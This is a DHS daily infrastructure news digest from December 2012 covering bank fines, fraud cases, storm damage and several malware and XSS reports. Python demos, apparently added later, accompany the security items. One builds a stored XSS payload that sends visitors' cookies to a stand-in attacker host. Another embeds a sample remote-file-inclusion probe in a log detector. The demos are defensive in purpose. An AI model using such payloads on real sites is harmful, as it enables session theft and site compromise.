Wednesday, December 12, 2012

Daily Report

Top Stories

 • HSBC agreed to pay a record $1.92 billion fine to settle a multi-year probe by U.S. prosecutors after being accused of failing to enforce rules designed to prevent the laundering of criminal cash, Reuters reported December 11. – Reuters  See item 6 below in the Banking and Finance Sector

 • The Associated Press reported December 11 that New Jersey Transit trains sustained about $100 million in damage from flooding during Hurricane Sandy after rail cars were stored in yards that models showed an 80 to 90 percent chance of not flooding, even with a massive storm bearing down on the region. – Associated Press

11. December 11, Associated Press – (New Jersey) NJ Transit chief: Train storage in storm ‘sound’. New Jersey Transit’s executive director December 11 defended his decision to store rail cars in Hoboken and Kearny to protect them during superstorm Sandy in October. He told the State Assembly’s Transportation Committee that rail yards in the two cities had never flooded before and that models showed an 80 to 90 percent chance the yards would not flood even with a massive storm bearing down on the region. The models turned out to be wrong, and NJ Transit trains sustained about $100 million in damage from flooding in the two storage yards. He said his agency is looking into places where rail cars and other equipment could be kept dry during future storms. The storm hit New Jersey’s commuter trains particularly hard, shutting down key stations on the Port Authority Trans-Hudson (PATH) line between New York and New Jersey and flooding cars. As a consequence, rail lines across the State were still experiencing delays. A former official at the Long Island Rail Road and Conrail said the rail car destruction in New Jersey, including damage to nearly one-fourth of its cars and locomotives, was largely preventable. Source:

 • A New York medical doctor pleaded guilty to an $11.7 million Medicare fraud scheme, admitting he gave spa services to Medicare beneficiaries in exchange for the use of their Medicare numbers, which were then billed for services never provided or not needed. – Insurance and Financial Advisor

21. December 11, Insurance and Financial Advisor – (New York) N.Y. doctor pleads guilty to $11.7M Medicare fraud scheme. A Flushing, New York medical doctor pleaded guilty to his role in an $11.7 million Medicare fraud scheme, Insurance and Financial Advisor reported December 11. Prosecutors said that while president of URI Medical Service PC and Sarang Medical PC, the doctor purportedly provided physical therapy and electric stimulation treatment; he admitted he gave spa services to Medicare beneficiaries in exchange for the use of their Medicare numbers, which were then billed for services never provided or not needed. Source:

 • The Seattle Post-Intelligencer reported that prosecutors added 33 charges against the central figures in a financial scandal in Seattle Public Schools after auditors said in a new report they discovered an additional $1.3 million that may have been spent incorrectly. – Seattle Post-Intelligencer

24. December 10, Seattle Post-Intelligencer – (Washington) Figures in Seattle schools scandal face 33 new charges. Prosecutors added 33 charges against the central figures in a financial scandal in Seattle Public Schools, the Seattle Post-Intelligencer reported December 10. Two men now face 42 charges of either first- or second-degree theft. King County prosecutors originally charged the two men and a woman with stealing $250,000 from a Seattle schools program meant to encourage small firms to bid on district projects. State auditors examining the small-business development program found that $1.5 million in expenditures were questionable and that $280,000 was paid for work that was not done or did not benefit Seattle Public Schools. This fall, auditors said in a new report that they had turned up an additional $1.3 million that may have been spent improperly. Source:


Banking and Finance Sector

6. December 11, Reuters – (International) HSBC to pay $1.9 billion U.S. fine in money-laundering case. HSBC has agreed to pay a record $1.92 billion fine to settle a multi-year probe by U.S. prosecutors, who accused Europe’s biggest bank of failing to enforce rules designed to prevent the laundering of criminal cash, Reuters reported December 11. The U.S. Department of Justice (DOJ) charged the bank with failing to maintain an effective program against money laundering and conduct due diligence on certain accounts. It also charged the bank with violating sanctions laws by doing business with customers in Iran, Libya, Sudan, Burma, and Cuba. In an agreement with the DOJ, the bank will take steps to fix the problems, pay a fine of $1.256 billion, and retain a compliance monitor to resolve the charges through a deferred-prosecution agreement. Including penalties imposed by other agencies, the bank’s fines totaled $1.92 billion. HSBC also faces civil penalties, to be announced later December 11. The settlement offers new information about failures at HSBC to police transactions linked to Mexico, details of which were reported this summer in a U.S. Senate probe. Between 2006 and 2010, HSBC ignored money-laundering risks associated with certain Mexican customers and allowed at least $881 million in drug trafficking proceeds, including proceeds from the Sinaloa Cartel in Mexico and the Norte del Valle Cartel in Colombia, to be laundered through the bank, according to the agreement. HSBC said it expected to also reach a settlement with British watchdog the Financial Services Authority. Source:

7. December 11, BankInfoSecurity – (International) 5 banks targeted for new DDoS attacks. A hacktivist group responsible for previous distributed denial of service (DDoS) attacks against banks announced the “second phase” of its campaign, saying five major U.S. banks will be the victims of new DDoS attacks starting the week of December 10, BankInfoSecurity reported December 11. U.S. Bancorp, JPMorgan Chase, Bank of America, PNC Financial Services Group, and SunTrust Banks are the latest targets, according to the group, which announced its plans in a December 10 Pastebin posting. Each of these five banks suffered DDoS attacks during phase one of the hacktivist group’s campaign, which ran roughly from mid-September to mid-October. During that period, the group claimed responsibility for attacks on 10 major banks. Each institution was warned ahead of time, but none was able to completely fend off the attacks, which caused online banking outages of varying lengths. Source:

8. December 10, Softpedia – (International) Fraudsters are setting up bogus hotel websites, experts find. Researchers at security firm Bitdefender warn that fraudulent hotel Web sites serve criminals for several purposes, including identity theft and money laundering, Softpedia reported December 10. In other cases, the sites simply ask individuals who want to book a room to pay a certain amount of money upfront. The fake Web sites usually leverage the names and reputations of famous brands. Unlike phishing sites, these fraud Web sites are not promoted via email or social media spam; instead, they are kept low-profile so that the domain is less likely to be noticed and seized by authorities. Source:

9. December 10, U.S. Department of Justice – (National) Former Dallas broker pleads guilty to defrauding investors through stock manipulation scheme. A former Dallas securities broker pleaded guilty December 10 for his role in a scheme to defraud thousands of investors through the manipulation of publicly traded stocks that created $44 million in illegal proceeds. The broker pleaded guilty in federal court in the Northern District of Oklahoma to one count of money laundering for laundering $250,000 in proceeds from the fraud. The broker was originally charged along with four other defendants in a 24-count indictment unsealed February 10, 2009. Prior to trial, he fled to Costa Rica, where he remained until he was extradited to the United States in May 2012. According to court documents and evidence presented at the 2010 trial, the defendants manipulated the stocks of three companies in a “pump and dump” scheme in which they manipulated the publicly traded penny stocks. The defendants and their nominees obtained significant profits by selling large amounts of shares after they had artificially inflated the stock price. For each of the three manipulated stocks, the co-conspirators’ sell-off caused declines of the stock price and left legitimate investors holding stock of significantly reduced value. Source:

Information Technology Sector

27. December 11, – (International) Google accidentally transmits self-destruct code to army of Chrome browsers. Google’s Gmail service went down for about 20 minutes December 10, which coincided with widespread reports that Google’s Chrome browser was also crashing. A Google engineer later confirmed the crashes were affecting Chrome users who were using another Google Web service known as Sync, and that Sync and other Google services were disrupted when Google misconfigured its load-balancing servers. The engineer wrote that a problem with Google’s Sync servers kicked off an error in the browser, which made Chrome abruptly shut down on the desktop. “It’s due to a backend service that sync servers depend on becoming overwhelmed, and sync servers responding to that by telling all clients to throttle all data types,” he said. That throttling instruction triggered a bug in the browser that caused it to crash. Source:

28. December 11, Softpedia – (International) Stored XSS that allowed hackers to hijack Tumblr blogs still unfixed. The stored cross-site scripting (XSS) vulnerability that allowed hackers to hijack Tumblr blogs remains unfixed, according to a security researcher. He explains that this vulnerability could be utilized for numerous cybercriminal operations. The stored XSS could be used for phishing, malware attacks, and even to spam users. The researcher also reveals some interesting facts about this particular stored XSS security hole. For instance, victims of attacks that exploit this vulnerability do not have to be logged in to Tumblr. Also, the bug could be used to spread a malicious payload because when an entry is reblogged, the payload is also included in the new post. Furthermore, arbitrary JavaScript can be executed in the victim’s browser from a remote location. Source:
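To make the propagation behaviour concrete, here is an added example (not Tumblr’s code and not the researcher’s) in Python: a toy in-memory blog store in which a reblog copies the stored post body verbatim, so a script payload stored once rides along into every reblog, and a public render function that needs no viewer login. The store, the payload, and the reporting host attacker.invalid are all constructed for this illustration; the hardened renderer shows the standard fix of escaping stored fields on output.

```python
# Added example, not Tumblr's code and not the researcher's: a toy blog store
# that shows how a stored XSS payload is copied into every reblog and how
# escaping on output neutralises it. The store, the payload and the reporting
# host "attacker.invalid" are all constructed for this illustration.
import html
from dataclasses import dataclass
from itertools import count
from typing import Dict, List, Optional

# Constructed payload: sends the viewer's cookie to an attacker-controlled host.
PAYLOAD = '<script>new Image().src="https://attacker.invalid/c?"+document.cookie</script>'


@dataclass
class Post:
    id: int
    author: str
    body: str                         # stored verbatim, markup included
    reblogged_from: Optional[int] = None


class Blog:
    """In-memory stand-in for the blog platform's post storage."""

    def __init__(self) -> None:
        self._ids = count(1)
        self.posts: Dict[int, Post] = {}

    def create(self, author: str, body: str) -> Post:
        post = Post(next(self._ids), author, body)
        self.posts[post.id] = post
        return post

    def reblog(self, post_id: int, new_author: str) -> Post:
        # A reblog copies the stored body unchanged, so any stored payload
        # propagates to the new post (the spreading behaviour described above).
        src = self.posts[post_id]
        post = Post(next(self._ids), new_author, src.body, reblogged_from=src.id)
        self.posts[post.id] = post
        return post


def render_unsafe(post: Post) -> str:
    # Vulnerable: the stored body is interpolated straight into the HTML page.
    # Public pages are served to anyone, so the viewer need not be logged in.
    return f"<article><h2>{post.author}</h2><div>{post.body}</div></article>"


def render_safe(post: Post) -> str:
    # Hardened: HTML-escape every stored field on output, so '<script>' is
    # emitted as '&lt;script&gt;' and rendered as text, never executed.
    return (f"<article><h2>{html.escape(post.author)}</h2>"
            f"<div>{html.escape(post.body)}</div></article>")


def infected_post_ids(blog: Blog) -> List[int]:
    """Posts whose stored body still carries script markup."""
    return sorted(p.id for p in blog.posts.values() if "<script" in p.body.lower())


def reblog_chain_demo() -> Blog:
    """Attacker posts once; two users reblog; the payload rides along each time."""
    blog = Blog()
    original = blog.create("attacker", "Cute cat pics! " + PAYLOAD)
    first = blog.reblog(original.id, "fan_one")
    blog.reblog(first.id, "fan_two")
    return blog


if __name__ == "__main__":
    blog = reblog_chain_demo()
    print("posts carrying the payload:", infected_post_ids(blog))
    print("unsafe render contains <script>:", "<script>" in render_unsafe(blog.posts[3]))
    print("safe render contains <script>:", "<script>" in render_safe(blog.posts[3]))
```

Escaping everything is the simplest correct fix for a field that should be plain text; a platform that deliberately allows rich HTML in posts needs an allowlist sanitizer applied to the stored body instead, and either way the fix has to be applied on output or at every write path, since the payload already sits in the database and in every reblog made before the fix.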

29. December 11, – (International) Researchers warn of malware attack from WordPress exploit. Security experts are warning webmasters about a series of attacks targeting the WordPress and Joomla publishing platforms. The SANS Institute said that it has received reports of multiple exploit attempts against the platforms. Compromised sites are then injected with code that redirects visitors to a third-party site. A SANS blogger and president of security firm Bambenek Consulting said the attacks were particularly interesting for their method of attempting to exploit pages en masse by targeting servers. “The interesting thing to note is that it doesn’t seem to be a scanner exploiting one vulnerability but some tool that’s basically firing a bunch of Joomla and WordPress exploits at a given server and hoping something hits,” he explained. SANS said the compromised sites are used to redirect users to an attack site that tries to infect them with a phony antivirus package. Source:
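The spray-and-pray behaviour described above leaves a distinctive trace in web server logs: one client requesting many different WordPress and Joomla exploit paths within seconds. The following added example (not the SANS post’s code) is a small Python detector run over constructed Apache combined-format log lines; the indicator paths, the four-target threshold, the 60-second window and the addresses (documentation ranges) are all assumptions made for the illustration.

```python
# Added example, not the SANS post's code: a detector for the "fire every
# WordPress and Joomla exploit at one server" behaviour described above, run
# over constructed Apache combined-format log lines. The indicator paths, the
# threshold and the addresses (documentation ranges) are all assumptions.
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterable, List, Optional, Tuple

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Request targets that a CMS exploit sprayer hammers (hypothetical list).
INDICATORS = [re.compile(p) for p in (
    r"^/wp-content/plugins/",
    r"^/wp-content/themes/",
    r"^/wp-admin/",
    r"^/xmlrpc\.php",
    r"^/administrator/",
    r"^/index\.php\?option=com_",
    r"^/components/com_",
)]

# Constructed sample: one sprayer, one ordinary visitor, one slow scanner.
SAMPLE_LOG = """\
198.51.100.5 - - [11/Dec/2012:09:00:01 +0000] "GET / HTTP/1.1" 200 6120 "-" "Mozilla/5.0"
203.0.113.7 - - [11/Dec/2012:09:00:10 +0000] "GET /wp-content/plugins/example-plugin/upload.php HTTP/1.1" 404 210 "-" "Mozilla/4.0"
203.0.113.7 - - [11/Dec/2012:09:00:11 +0000] "GET /wp-content/themes/example-theme/thumb.php?src=http://evil.invalid/x.php HTTP/1.1" 404 210 "-" "Mozilla/4.0"
203.0.113.7 - - [11/Dec/2012:09:00:12 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/4.0"
203.0.113.7 - - [11/Dec/2012:09:00:13 +0000] "GET /index.php?option=com_example&task=upload HTTP/1.1" 404 210 "-" "Mozilla/4.0"
203.0.113.7 - - [11/Dec/2012:09:00:14 +0000] "GET /administrator/index.php HTTP/1.1" 404 210 "-" "Mozilla/4.0"
203.0.113.7 - - [11/Dec/2012:09:00:15 +0000] "GET /components/com_example/ HTTP/1.1" 404 210 "-" "Mozilla/4.0"
198.51.100.5 - - [11/Dec/2012:09:00:20 +0000] "GET /wp-content/themes/site/style.css HTTP/1.1" 200 4400 "-" "Mozilla/5.0"
192.0.2.33 - - [11/Dec/2012:09:05:00 +0000] "GET /wp-admin/ HTTP/1.1" 302 0 "-" "curl/7.21"
192.0.2.33 - - [11/Dec/2012:09:30:00 +0000] "GET /xmlrpc.php HTTP/1.1" 200 370 "-" "curl/7.21"
"""

Record = Tuple[str, datetime, str, int]


def parse_line(line: str) -> Optional[Record]:
    """Return (ip, timestamp, request target, status) or None for unparsable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("target"), int(m.group("status"))


def is_cms_probe(target: str) -> bool:
    return any(r.search(target) for r in INDICATORS)


def find_sprayers(lines: Iterable[str], threshold: int = 4,
                  window: timedelta = timedelta(seconds=60)) -> Dict[str, int]:
    """Map client IP -> most distinct CMS exploit targets it hit inside one window.

    Only IPs reaching `threshold` distinct targets within `window` are returned;
    counting distinct targets (not requests) is what separates a sprayer from a
    visitor loading a theme stylesheet or a slow, single-path scanner.
    """
    hits: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and is_cms_probe(rec[2]):
            hits[rec[0]].append((rec[1], rec[2]))

    flagged: Dict[str, int] = {}
    for ip, events in hits.items():
        events.sort()
        in_window: Counter = Counter()
        lo = 0
        for ts, target in events:                # sliding window over time
            in_window[target] += 1
            while ts - events[lo][0] > window:   # drop events older than window
                old = events[lo][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                lo += 1
            if len(in_window) >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), len(in_window))
    return flagged


if __name__ == "__main__":
    for ip, n in find_sprayers(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {n} distinct CMS exploit targets within 60s")
```

On the sample, only 203.0.113.7 is flagged: the visitor’s stylesheet request matches a theme path but is a single target, and the slow scanner’s two requests fall outside the window. Status codes are parsed but deliberately not used as a filter, because a sprayer that hits an installed component gets a 200 just like a legitimate request.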

30. December 11, Threatpost – (International) Kelihos update includes new TLD and USB infection capabilities. The Kelihos botnet is now relying on double fast-flux domains to spread spam and malware. According to an analysis from a researcher at, Kelihos has also switched top-level domains, moving to .ru from .eu. More insidious, however, is that it now has the ability to spread via removable drives such as USB storage devices. Once this latest update of Kelihos infects a computer, it connects with a .ru domain hosting its command and control looking for updates. The .ru domain is double fast-flux hosted, the researcher said. Once an updated version of Kelihos is sent to the infected machine, it will infect any removable drives attached to the computer by exploiting the same vulnerability as Stuxnet. The switch to .ru domains happened during the summer, according to the report, and the attackers have a lengthy list of sites from which to send new binaries updating the botnet, all of which are registered to REGGI-RU, a registrar in Russia. The botnet operators, however, are using a registrar in the Bahamas to register the name server domains providing DNS resolution to the Russian domains hosting malware. Kelihos boasts up to 150,000 spambots per day. Source:
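The “double fast-flux” hosting described above means both the domain’s own A records and the addresses of its name servers rotate rapidly through compromised hosts. The following added example (not taken from the Kelihos analysis) is a simplified Python classifier run over constructed DNS lookup snapshots: it counts distinct addresses seen over time for the domain and, separately, for its name servers, and calls the domain double fast-flux only when both churn under short TTLs. The thresholds, TTLs and all addresses (documentation ranges) are assumptions.

```python
# Added example, not from the Kelihos analysis: a simplified fast-flux
# classifier run over constructed DNS lookup snapshots. It scores how many
# distinct A-record addresses a domain returns over time and, separately, how
# many distinct addresses its name servers resolve to; churn in both is the
# "double fast-flux" hosting described above. Thresholds, TTLs and all
# addresses (documentation ranges) are assumptions.
from dataclasses import dataclass
from typing import Dict, List, Set


@dataclass
class Snapshot:
    minute: int          # minutes since the first lookup (constructed)
    a_records: Set[str]  # A records returned for the domain itself
    a_ttl: int           # TTL on those A records, seconds
    ns_ips: Set[str]     # addresses the domain's NS hosts resolved to
    ns_ttl: int          # TTL on the NS hosts' A records, seconds


def flux_metrics(snapshots: List[Snapshot]) -> Dict[str, float]:
    """Churn statistics across a series of lookups of one domain."""
    a_all: Set[str] = set().union(*(s.a_records for s in snapshots))
    ns_all: Set[str] = set().union(*(s.ns_ips for s in snapshots))
    # Fraction of the A answer that was replaced between consecutive lookups.
    turnover = [
        1 - len(cur.a_records & prev.a_records) / max(len(cur.a_records), 1)
        for prev, cur in zip(snapshots, snapshots[1:])
    ]
    return {
        "a_distinct": len(a_all),
        "ns_distinct": len(ns_all),
        "a_ttl_max": max(s.a_ttl for s in snapshots),
        "ns_ttl_max": max(s.ns_ttl for s in snapshots),
        "a_turnover": sum(turnover) / len(turnover) if turnover else 0.0,
    }


def classify(snapshots: List[Snapshot], min_distinct: int = 8,
             max_ttl: int = 300) -> str:
    """'stable', 'single fast-flux' (A records churn) or 'double fast-flux' (NS churn too)."""
    m = flux_metrics(snapshots)
    a_flux = m["a_distinct"] >= min_distinct and m["a_ttl_max"] <= max_ttl
    ns_flux = m["ns_distinct"] >= min_distinct and m["ns_ttl_max"] <= max_ttl
    if a_flux and ns_flux:
        return "double fast-flux"
    if a_flux:
        return "single fast-flux"
    return "stable"


def _ips(prefix: str, start: int, n: int) -> Set[str]:
    return {f"{prefix}.{i}" for i in range(start, start + n)}


# Constructed lookup series: one snapshot every 5 minutes for an hour.
MINUTES = list(range(0, 60, 5))

# Ordinary site: two fixed addresses, long TTLs, fixed name servers.
STABLE = [Snapshot(m, _ips("192.0.2", 10, 2), 3600, _ips("192.0.2", 1, 2), 86400)
          for m in MINUTES]
# A records rotate through compromised hosts on every lookup; NS hosts are fixed.
SINGLE = [Snapshot(m, _ips("203.0.113", 1 + 3 * k, 3), 180, _ips("192.0.2", 1, 2), 86400)
          for k, m in enumerate(MINUTES)]
# Both the A records and the name servers' addresses rotate.
DOUBLE = [Snapshot(m, _ips("203.0.113", 1 + 3 * k, 3), 180, _ips("198.51.100", 1 + 2 * k, 2), 300)
          for k, m in enumerate(MINUTES)]


if __name__ == "__main__":
    for name, series in (("stable", STABLE), ("single", SINGLE), ("double", DOUBLE)):
        print(f"{name}: {classify(series)} {flux_metrics(series)}")
```

Large content delivery networks also return many addresses with short TTLs, so in practice a count of distinct addresses is combined with address diversity (how many networks or autonomous systems the addresses span) before a domain is treated as flux-hosted; the example keeps only the churn measurements the passage describes.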

31. December 11, CNET News – (International) Nokia engineer: Here’s how to hack Windows 8 games. A Nokia engineer posted an explanation on how the “use of innate Windows 8 security attack vectors” can allow a person with admittedly advanced knowledge to “compromise Windows 8 games revenue stream.” The hack, which can be completed in five multipart steps, does not necessarily highlight a security flaw that would leave users vulnerable. Instead, the hack shows the way in which hackers can get a paid game for free because of inherent flaws in the way in which apps are stored and handled by Windows 8. Source:

32. December 10, Bloomberg News – (International) Facebook restored after site maintenance disrupted some access. Facebook said it fixed an outage that left some users unable to access its social network while the company made a change to the site’s infrastructure December 10. “We made a change to our DNS infrastructure, and that change resulted in some people being temporarily unable to reach the site,” a Facebook spokeswoman said in an emailed statement. “We detected and resolved the issue quickly, and we are now back to 100 percent.” Source:

33. December 10, The H – (International) Only 15% of known malware caught by Android 4.2’s verifier. A researcher at North Carolina State University found that only 15 percent of known malware samples tested against Android 4.2’s new app verification service were detected. The researcher loaded 1,260 malware samples from the Android Malware Genome Project onto 10 Android 4.2 devices. Of the 1,260 samples, only 193 were detected as malware. The researcher also compared Google’s verification against ten existing anti-virus engines through VirusTotal, using randomly selected samples from each malware family. The anti-virus engines run by VirusTotal ranged in efficacy from 100 percent down to 51 percent, while the Android app verification system scored only 20.4 percent. The researcher noted that the app verification service relies on a fragile mechanism, checking the SHA1 value of the app together with its package name to decide whether a package is dangerous or potentially dangerous. He also notes that the verification depends entirely on the server component, leaving the client side of the system with no detection capability of its own. Source:
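To show why a lookup keyed on the whole-file SHA1 plus package name is fragile, here is an added Python example (not Google’s verifier code and not the researcher’s test harness). It builds two in-memory archives laid out like APKs with identical code but one extra asset file: the whole-file hash of the repackaged copy no longer matches the blocklist entry, while a hash of the code entry alone still does. The package name, the fake DEX bytes and both blocklists are constructed for the illustration.

```python
# Added example, not Google's verifier code: why a blocklist keyed on the
# whole-file SHA1 plus package name (the mechanism the researcher criticises
# above) is brittle. Two in-memory "APKs" are built with identical code but one
# extra asset file; the file hash no longer matches while the code inside does.
# The package name, the fake DEX bytes and the blocklists are constructed.
import hashlib
import io
import zipfile
from typing import Dict, Optional

PACKAGE = "com.example.bad"
# Constructed stand-in for compiled app code (not a real DEX file).
BAD_DEX = b"dex\n035\x00" + b"\x90" * 64 + b"read_contacts;post_to_c2"


def sha1(data: bytes) -> str:
    return hashlib.sha1(data).hexdigest()


def build_apk(dex: bytes, extra: Optional[Dict[str, bytes]] = None) -> bytes:
    """Minimal zip laid out like an APK, with fixed timestamps so builds are reproducible."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        entries = {"AndroidManifest.xml": f"<manifest package='{PACKAGE}'/>".encode(),
                   "classes.dex": dex}
        entries.update(extra or {})
        for name, data in entries.items():
            info = zipfile.ZipInfo(name, date_time=(2012, 12, 11, 0, 0, 0))
            z.writestr(info, data, compress_type=zipfile.ZIP_DEFLATED)
    return buf.getvalue()


def dex_hash(apk: bytes) -> str:
    """SHA1 of the code entry only, ignoring manifest, assets and zip layout."""
    with zipfile.ZipFile(io.BytesIO(apk)) as z:
        return sha1(z.read("classes.dex"))


# The sample that was submitted and blocklisted.
KNOWN_BAD = build_apk(BAD_DEX)
# The same malware re-zipped with one harmless extra file.
REPACKED = build_apk(BAD_DEX, {"assets/notes.txt": b"build 2"})

FILE_BLOCKLIST = {(sha1(KNOWN_BAD), PACKAGE)}   # (whole-file SHA1, package name)
DEX_BLOCKLIST = {dex_hash(KNOWN_BAD)}            # SHA1 of the code entry only


def verify_by_file_hash(apk: bytes, package: str) -> str:
    # Mirrors the fragile scheme: any byte change to the archive evades it.
    return "dangerous" if (sha1(apk), package) in FILE_BLOCKLIST else "unknown"


def verify_by_dex_hash(apk: bytes, package: str) -> str:
    # Keying on the code component survives repackaging that leaves code alone
    # (an attacker who re-obfuscates the DEX still evades this too).
    return "dangerous" if dex_hash(apk) in DEX_BLOCKLIST else "unknown"


if __name__ == "__main__":
    print("original, file hash :", verify_by_file_hash(KNOWN_BAD, PACKAGE))
    print("repacked, file hash :", verify_by_file_hash(REPACKED, PACKAGE))
    print("repacked, dex hash  :", verify_by_dex_hash(REPACKED, PACKAGE))
```

The component hash is only a modest improvement, since a fresh obfuscation of the code defeats it just as easily; the point is that any exact-hash scheme, whatever it hashes, recognises only samples already seen by the server, which is consistent with the low detection rate reported above.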

Communications Sector

Nothing to report.

Department of Homeland Security (DHS)
DHS Daily Open Source Infrastructure Report Contact Information

About the reports - The DHS Daily Open Source Infrastructure Report is a daily [Monday through Friday] summary of open-source published information concerning significant critical infrastructure issues. The DHS Daily Open Source Infrastructure Report is archived for ten days on the Department of Homeland Security Web site:

Contact Information

Content and Suggestions: Send mail to or contact the DHS Daily Report Team at (703)387-2314

Subscribe to the Distribution List: Visit the DHS Daily Open Source Infrastructure Report and follow instructions to Get e-mail updates when this information changes.

Removal from Distribution List:     Send mail to

Contact DHS

To report physical infrastructure incidents or to request information, please contact the National Infrastructure
Coordinating Center at or (202) 282-9201.

To report cyber infrastructure incidents or to request information, please contact US-CERT at or visit their Web page at v.

Department of Homeland Security Disclaimer

The DHS Daily Open Source Infrastructure Report is a non-commercial publication intended to educate and inform personnel engaged in infrastructure protection. Further reproduction or redistribution is subject to original copyright restrictions. DHS provides no warranty of ownership of the copyright, or accuracy with respect to the original source material.